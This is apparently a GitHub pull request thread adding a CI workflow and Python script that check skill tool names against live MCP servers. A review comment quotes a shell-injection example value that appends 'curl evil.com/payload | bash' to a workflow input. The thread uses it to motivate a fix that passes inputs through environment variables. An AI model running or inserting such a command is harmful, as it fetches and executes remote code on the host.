ci: add MCP tool name validation against live servers#95
Conversation
Adds a CI check that starts each pack's MCP servers (from mcps.json) and cross-references the `allowed-tools` declared in SKILL.md frontmatter against the actual tools exposed by the server. This catches tool name mismatches (e.g., pod_list vs pods_list) that would silently break skills at runtime but pass all static linters. Components: - scripts/validate-mcp-tools.sh: bash script that starts container- based MCP servers via podman, sends JSON-RPC initialize + tools/list, and validates each skill's allowed-tools against the response - .github/workflows/mcp-tool-validation.yml: GitHub Actions workflow using Kind cluster + podman, triggers on changes to mcps.json or SKILL.md files Co-authored-by: Cursor <cursoragent@cursor.com>
Replace bash script with a pure-Python implementation for cross-OS portability. Key improvements: - Response-based MCP communication via subprocess + select (no sleeps) - Explicit image pulling with error handling - JSON-RPC pagination support (follows nextCursor) - Levenshtein-based "did you mean?" suggestions for mismatched tools - Graceful handling of servers that exit immediately (missing creds) - File path and line number in error output - Logging of skipped non-container MCP servers Workflow hardening: - Pin all GitHub Actions to SHA - Add permissions: contents: read - Add concurrency group with cancel-in-progress - Add timeout-minutes: 10 - Explicit KUBECONFIG capture from Kind - Add workflow_dispatch pack input for manual runs - Inline pack detection (remove dependency on detect-changed-packs.sh) Co-authored-by: Cursor <cursoragent@cursor.com>
|
Hey @jordigilh thanks for your contribution to proactively catch these mismtaches! Apart from that, 2 comments on this awesome PR: |
|
Thanks @dmartinol — totally understand the post-Summit freeze. No rush on merging this one. On your two suggestions:
Happy to iterate on both after Summit. Let me know if there's anything else you'd like adjusted in the meantime. |
Thanks for being available to extend this solution! And yes, we'll also extend the coverage of |
|
@dmartinol @r2dedios Thanks for the feedback on integrating this into the Option A: Add it to The script would detect missing prerequisites (no podman, no KUBECONFIG) and exit 0 with a warning instead of failing. This keeps
Option B: Standalone target + keep workflows separate Add
I'm leaning toward Option B since MCP validation is fundamentally a runtime check (starts containers, JSON-RPC handshake) while the other validate steps are static. But happy to go with either — what's your preference? |
Hey @jordigilh, good catch! BTW: other tools we should be considering are the CLI tools that are sometimes referred in the |
- Add validate_mcp_tools.py to the main `validate` Makefile target - Add standalone `validate-mcp-tools` target with PACK= filter support - Add graceful prerequisite detection: script exits 0 with a SKIP message when podman or KUBECONFIG is unavailable, so `make validate` never breaks in environments without container tooling - Improve tool name suggestions with substring/prefix matching and component overlap scoring alongside the existing Levenshtein distance Co-authored-by: Cursor <cursoragent@cursor.com>
| KUBECONFIG: ${{ env.KUBECONFIG }} | ||
| run: | | ||
| if [ "${{ github.event_name }}" = "workflow_dispatch" ] && [ -n "${{ inputs.pack }}" ]; then | ||
| python scripts/validate_mcp_tools.py "${{ inputs.pack }}" |
There was a problem hiding this comment.
Potential security injection risk. If someone introduces a bash command like foo"; curl evil.com/payload | bash; echo " it could create a huge mess. I propose using another EnvVar, so Github will use the value of ${{ inputs.pack }} always as Strings, and never a executable code.
env:
PACK: ${{ inputs.pack }}
run: python scripts/validate_mcp_tools.py "$PACK"
There was a problem hiding this comment.
Good catch — fixed in 1167429.
All ${{ }} expressions in run: blocks are now routed through env: vars:
inputs.pack→INPUT_PACKgithub.base_ref→BASE_REFsteps.detect.outputs.packs→CHANGED_PACKSsteps.detect.outputs.changed→PACKS_CHANGEDgithub.event_name→EVENT_NAME
Shell only ever sees quoted env var references, never raw template interpolation.
| sudo apt-get update -qq | ||
| sudo apt-get install -y -qq podman | ||
|
|
||
| - name: Create Kind cluster |
There was a problem hiding this comment.
Why the Kind cluster creation at this point? Is it for generating a kubeconfig file for the MCP? If we only want to get the tools list, we can use an empty kubeconfig and query the MCP for the Tools list and we will not need to setup a Kind cluster everytime
There was a problem hiding this comment.
Great observation — you're right, tools/list is purely metadata and doesn't require cluster connectivity. Fixed in 1167429.
Removed the Kind cluster entirely and replaced it with a minimal dummy kubeconfig that satisfies the MCP server's startup requirement. This saves ~2 minutes of CI time per run and removes the helm/kind-action dependency.
- Fix shell injection: route all ${{ }} expressions through env vars
(inputs.pack, github.base_ref, steps.detect.outputs.packs)
- Remove Kind cluster: tools/list doesn't need cluster connectivity,
use a dummy kubeconfig instead (~2 min CI savings)
- Remove unused `import re` and dead `TOOLS_LIST_MSG` constant
- Add error handling for malformed mcps.json files
Co-authored-by: Cursor <cursoragent@cursor.com>
- Fix race condition: replace time.sleep(0.5) with poll loop (10x100ms) for more reliable server startup detection - Document platform requirement (Linux/macOS) in script docstring - Document fetch-depth: 0 rationale in workflow comment - Simplify workflow dispatch logic with early-exit for unchanged PRs - Update Makefile messaging to clarify graceful skip behavior Co-authored-by: Cursor <cursoragent@cursor.com>
Summary
mcps.json) via podman and cross-references theallowed-toolsdeclared inSKILL.mdfrontmatter against the actual tools exposed by the serverpod_listvspods_list) that pass all static linters but silently break skills at runtimeMotivation
While working on PRs #79 and #80, we discovered 6 tool name mismatches between our SKILL.md declarations and the actual MCP server tool registry. These went undetected by the existing
skill-linterandcompliance-checkbecause they only validate static structure, not runtime tool availability.pod_listpods_listpod_logspods_logget_metric_namesget_metric_metadataget_seriesqueryprometheus_queryComponents
scripts/validate-mcp-tools.sh— Starts container-based MCP servers via podman, sends JSON-RPCinitialize+tools/list, and validates each skill'sallowed-tools.github/workflows/mcp-tool-validation.yml— GitHub Actions workflow using Kind cluster + podman, triggers on changes tomcps.jsonorSKILL.mdfilesTest plan
rh-developerpack — correctly detected 6 mismatches inincident-triage(pre-fix) and passeddebug-scc/debug-rbac(post-fix)Made with Cursor